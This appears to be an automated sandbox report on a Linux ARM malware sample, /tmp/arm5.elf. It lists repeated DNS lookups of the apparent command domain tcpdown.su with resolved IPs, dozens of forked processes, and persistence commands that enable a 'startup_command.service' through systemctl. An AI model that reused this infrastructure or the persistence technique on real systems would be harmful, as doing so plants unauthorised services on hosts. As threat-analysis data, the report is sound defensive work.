                                                      Jan 7, 2025 01:28:51.039915085 CET3602453192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:28:56.041621923 CET3418053192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:29:01.045727015 CET4088853192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:29:06.050189972 CET3680053192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:29:11.053636074 CET3617753192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:29:17.601105928 CET5295953192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:29:17.608778000 CET53529591.1.1.1192.168.2.13
                                                      Jan 7, 2025 01:29:17.609426022 CET4543553192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:29:17.617476940 CET53454351.1.1.1192.168.2.13
                                                      Jan 7, 2025 01:29:17.618112087 CET3841853192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:29:17.625271082 CET53384181.1.1.1192.168.2.13
                                                      Jan 7, 2025 01:29:17.628978014 CET4782653192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:29:17.635952950 CET53478261.1.1.1192.168.2.13
                                                      Jan 7, 2025 01:29:17.636749029 CET5325453192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:29:17.645555019 CET53532541.1.1.1192.168.2.13
                                                      Jan 7, 2025 01:29:17.646199942 CET5264653192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:29:22.655579090 CET4567053192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:29:27.657638073 CET3331553192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:29:32.664514065 CET4596353192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:29:37.669831038 CET3672353192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:29:44.232898951 CET4264353192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:29:44.239711046 CET53426431.1.1.1192.168.2.13
                                                      Jan 7, 2025 01:29:44.240386963 CET3489053192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:29:44.247523069 CET53348901.1.1.1192.168.2.13
                                                      Jan 7, 2025 01:29:44.248133898 CET3451853192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:29:44.267493010 CET53345181.1.1.1192.168.2.13
                                                      Jan 7, 2025 01:29:44.268177032 CET3918853192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:29:44.282350063 CET53391881.1.1.1192.168.2.13
                                                      Jan 7, 2025 01:29:44.282936096 CET5291353192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:29:44.290131092 CET53529131.1.1.1192.168.2.13
                                                      Jan 7, 2025 01:29:44.290682077 CET4448253192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:29:49.294729948 CET4385953192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:29:54.297662973 CET4605953192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:29:59.302301884 CET4214353192.168.2.131.1.1.1
                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Jan 7, 2025 01:27:56.028634071 CET192.168.2.131.1.1.10x8159Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:27:56.039400101 CET192.168.2.131.1.1.10x4ac6Standard query (0)tcpdown.su|1A (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:27:56.050663948 CET192.168.2.131.1.1.10x4ac6Standard query (0)tcpdown.su|1A (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:27:56.062861919 CET192.168.2.131.1.1.10x4ac6Standard query (0)tcpdown.su|1A (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:27:56.072755098 CET192.168.2.131.1.1.10x4ac6Standard query (0)tcpdown.su|1A (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:27:56.089766979 CET192.168.2.131.1.1.10x4ac6Standard query (0)tcpdown.su|1A (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:27:57.670093060 CET192.168.2.131.1.1.10x30d4Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:27:57.681900978 CET192.168.2.131.1.1.10x30d4Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:27:57.705338001 CET192.168.2.131.1.1.10x30d4Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:27:57.724271059 CET192.168.2.131.1.1.10x30d4Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:27:57.742723942 CET192.168.2.131.1.1.10x30d4Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:27:57.760874033 CET192.168.2.131.1.1.10xb6d8Standard query (0)tcpdown.suo. [malformed]256273false
                                                      Jan 7, 2025 01:28:02.773195028 CET192.168.2.131.1.1.10xb6d8Standard query (0)tcpdown.suo. [malformed]256274false
                                                      Jan 7, 2025 01:28:07.796875954 CET192.168.2.131.1.1.10xb6d8Standard query (0)tcpdown.suo. [malformed]256280false
                                                      Jan 7, 2025 01:28:12.816653967 CET192.168.2.131.1.1.10xb6d8Standard query (0)tcpdown.suo. [malformed]256284false
                                                      Jan 7, 2025 01:28:17.822242022 CET192.168.2.131.1.1.10xb6d8Standard query (0)tcpdown.suo. [malformed]256289false
                                                      Jan 7, 2025 01:28:24.397305965 CET192.168.2.131.1.1.10xfe61Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:28:24.405100107 CET192.168.2.131.1.1.10xfe61Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:28:24.424920082 CET192.168.2.131.1.1.10xfe61Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:28:24.433701992 CET192.168.2.131.1.1.10xfe61Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:28:24.441704988 CET192.168.2.131.1.1.10xfe61Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:28:24.451879978 CET192.168.2.131.1.1.10xe301Standard query (0)tcpdown.suo. [malformed]256299false
                                                      Jan 7, 2025 01:28:29.453876019 CET192.168.2.131.1.1.10xe301Standard query (0)tcpdown.suo. [malformed]256304false
                                                      Jan 7, 2025 01:28:34.457639933 CET192.168.2.131.1.1.10xe301Standard query (0)tcpdown.suo. [malformed]256309false
                                                      Jan 7, 2025 01:28:39.461802959 CET192.168.2.131.1.1.10xe301Standard query (0)tcpdown.suo. [malformed]256315false
                                                      Jan 7, 2025 01:28:44.465631962 CET192.168.2.131.1.1.10xe301Standard query (0)tcpdown.suo. [malformed]256321false
                                                      Jan 7, 2025 01:28:50.983656883 CET192.168.2.131.1.1.10x2343Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:28:50.992981911 CET192.168.2.131.1.1.10x2343Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:28:51.008529902 CET192.168.2.131.1.1.10x2343Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:28:51.023720026 CET192.168.2.131.1.1.10x2343Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:28:51.031742096 CET192.168.2.131.1.1.10x2343Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:28:51.039915085 CET192.168.2.131.1.1.10x4a1Standard query (0)tcpdown.suo. [malformed]256324false
                                                      Jan 7, 2025 01:28:56.041621923 CET192.168.2.131.1.1.10x4a1Standard query (0)tcpdown.suo. [malformed]256330false
                                                      Jan 7, 2025 01:29:01.045727015 CET192.168.2.131.1.1.10x4a1Standard query (0)tcpdown.suo. [malformed]256338false
                                                      Jan 7, 2025 01:29:06.050189972 CET192.168.2.131.1.1.10x4a1Standard query (0)tcpdown.suo. [malformed]256339false
                                                      Jan 7, 2025 01:29:11.053636074 CET192.168.2.131.1.1.10x4a1Standard query (0)tcpdown.suo. [malformed]256344false
                                                      Jan 7, 2025 01:29:17.601105928 CET192.168.2.131.1.1.10xac14Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:29:17.609426022 CET192.168.2.131.1.1.10xac14Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:29:17.618112087 CET192.168.2.131.1.1.10xac14Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:29:17.628978014 CET192.168.2.131.1.1.10xac14Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:29:17.636749029 CET192.168.2.131.1.1.10xac14Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:29:17.646199942 CET192.168.2.131.1.1.10xe3cStandard query (0)tcpdown.suo. [malformed]256354false
                                                      Jan 7, 2025 01:29:22.655579090 CET192.168.2.131.1.1.10xe3cStandard query (0)tcpdown.suo. [malformed]256354false
                                                      Jan 7, 2025 01:29:27.657638073 CET192.168.2.131.1.1.10xe3cStandard query (0)tcpdown.suo. [malformed]256360false
                                                      Jan 7, 2025 01:29:32.664514065 CET192.168.2.131.1.1.10xe3cStandard query (0)tcpdown.suo. [malformed]256369false
                                                      Jan 7, 2025 01:29:37.669831038 CET192.168.2.131.1.1.10xe3cStandard query (0)tcpdown.suo. [malformed]256369false
                                                      Jan 7, 2025 01:29:44.232898951 CET192.168.2.131.1.1.10xc2f7Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:29:44.240386963 CET192.168.2.131.1.1.10xc2f7Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:29:44.248133898 CET192.168.2.131.1.1.10xc2f7Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:29:44.268177032 CET192.168.2.131.1.1.10xc2f7Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:29:44.282936096 CET192.168.2.131.1.1.10xc2f7Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:29:44.290682077 CET192.168.2.131.1.1.10xf6b4Standard query (0)tcpdown.suo. [malformed]256381false
                                                      Jan 7, 2025 01:29:49.294729948 CET192.168.2.131.1.1.10xf6b4Standard query (0)tcpdown.suo. [malformed]256384false
                                                      Jan 7, 2025 01:29:54.297662973 CET192.168.2.131.1.1.10xf6b4Standard query (0)tcpdown.suo. [malformed]256390false
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Jan 7, 2025 01:27:56.035677910 CET1.1.1.1192.168.2.130x8159No error (0)tcpdown.su45.200.149.95A (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:27:56.035677910 CET1.1.1.1192.168.2.130x8159No error (0)tcpdown.su45.200.149.96A (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:27:56.035677910 CET1.1.1.1192.168.2.130x8159No error (0)tcpdown.su23.94.242.130A (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:27:56.035677910 CET1.1.1.1192.168.2.130x8159No error (0)tcpdown.su104.168.33.8A (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:27:56.035677910 CET1.1.1.1192.168.2.130x8159No error (0)tcpdown.su23.94.37.42A (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:27:56.035677910 CET1.1.1.1192.168.2.130x8159No error (0)tcpdown.su45.200.149.249A (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:27:56.035677910 CET1.1.1.1192.168.2.130x8159No error (0)tcpdown.su45.200.149.167A (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:27:56.047415018 CET1.1.1.1192.168.2.130x4ac6Name error (3)tcpdown.su|1nonenoneA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:27:56.059755087 CET1.1.1.1192.168.2.130x4ac6Name error (3)tcpdown.su|1nonenoneA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:27:56.069763899 CET1.1.1.1192.168.2.130x4ac6Name error (3)tcpdown.su|1nonenoneA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:27:56.086808920 CET1.1.1.1192.168.2.130x4ac6Name error (3)tcpdown.su|1nonenoneA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:27:56.098995924 CET1.1.1.1192.168.2.130x4ac6Name error (3)tcpdown.su|1nonenoneA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:27:57.677966118 CET1.1.1.1192.168.2.130x30d4Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:27:57.701088905 CET1.1.1.1192.168.2.130x30d4Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:27:57.719511032 CET1.1.1.1192.168.2.130x30d4Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:27:57.738755941 CET1.1.1.1192.168.2.130x30d4Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:27:57.757059097 CET1.1.1.1192.168.2.130x30d4Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:28:24.404450893 CET1.1.1.1192.168.2.130xfe61Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:28:24.424210072 CET1.1.1.1192.168.2.130xfe61Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:28:24.433070898 CET1.1.1.1192.168.2.130xfe61Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:28:24.441091061 CET1.1.1.1192.168.2.130xfe61Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:28:24.451229095 CET1.1.1.1192.168.2.130xfe61Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:28:50.992387056 CET1.1.1.1192.168.2.130x2343Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:28:51.007659912 CET1.1.1.1192.168.2.130x2343Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:28:51.022861958 CET1.1.1.1192.168.2.130x2343Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:28:51.030919075 CET1.1.1.1192.168.2.130x2343Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:28:51.039036036 CET1.1.1.1192.168.2.130x2343Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:29:17.608778000 CET1.1.1.1192.168.2.130xac14Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:29:17.617476940 CET1.1.1.1192.168.2.130xac14Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:29:17.625271082 CET1.1.1.1192.168.2.130xac14Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:29:17.635952950 CET1.1.1.1192.168.2.130xac14Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:29:17.645555019 CET1.1.1.1192.168.2.130xac14Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:29:44.239711046 CET1.1.1.1192.168.2.130xc2f7Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:29:44.247523069 CET1.1.1.1192.168.2.130xc2f7Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:29:44.267493010 CET1.1.1.1192.168.2.130xc2f7Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:29:44.282350063 CET1.1.1.1192.168.2.130xc2f7Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 01:29:44.290131092 CET1.1.1.1192.168.2.130xc2f7Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false

                                                      System Behavior

                                                      Start time (UTC):00:27:53
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:/tmp/arm5.elf
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:27:53
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:27:53
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:28:00
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:28:00
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:28:01
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:28:01
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:28:01
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:28:02
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:28:06
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:28:06
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:28:12
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:28:12
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:28:17
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:28:17
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:28:22
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:28:27
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:28:27
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:28:32
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:28:32
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:28:37
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:28:37
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:28:42
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:28:42
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:28:51
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:28:51
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:28:57
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:28:57
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:29:06
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:29:06
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:29:11
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:29:11
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:29:21
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:29:21
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:29:27
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:29:27
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:29:27
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:29:36
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:29:42
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:29:42
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:29:42
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:29:51
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:29:51
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:29:51
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:29:57
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:29:57
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:27:53
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:27:54
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:27:53
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:27:53
                                                      Start date (UTC):07/01/2025
                                                      Path:/bin/sh
                                                      Arguments:sh -c "systemctl daemon-reload"
                                                      File size:129816 bytes
                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                      Start time (UTC):00:27:54
                                                      Start date (UTC):07/01/2025
                                                      Path:/bin/sh
                                                      Arguments:-
                                                      File size:129816 bytes
                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                      Start time (UTC):00:27:54
                                                      Start date (UTC):07/01/2025
                                                      Path:/usr/bin/systemctl
                                                      Arguments:systemctl daemon-reload
                                                      File size:996584 bytes
                                                      MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                      Start time (UTC):00:27:54
                                                      Start date (UTC):07/01/2025
                                                      Path:/tmp/arm5.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):00:27:54
                                                      Start date (UTC):07/01/2025
                                                      Path:/bin/sh
                                                      Arguments:sh -c "systemctl enable startup_command.service"
                                                      File size:129816 bytes
                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                      Start time (UTC):00:27:54
                                                      Start date (UTC):07/01/2025
                                                      Path:/bin/sh
                                                      Arguments:-
                                                      File size:129816 bytes
                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                      Start time (UTC):00:27:54
                                                      Start date (UTC):07/01/2025
                                                      Path:/usr/bin/systemctl
                                                      Arguments:systemctl enable startup_command.service
                                                      File size:996584 bytes
                                                      MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                      Start time (UTC):00:27:54
                                                      Start date (UTC):07/01/2025
                                                      Path:/usr/lib/systemd/systemd
                                                      Arguments:-
                                                      File size:1620224 bytes
                                                      MD5 hash:9b2bec7092a40488108543f9334aab75

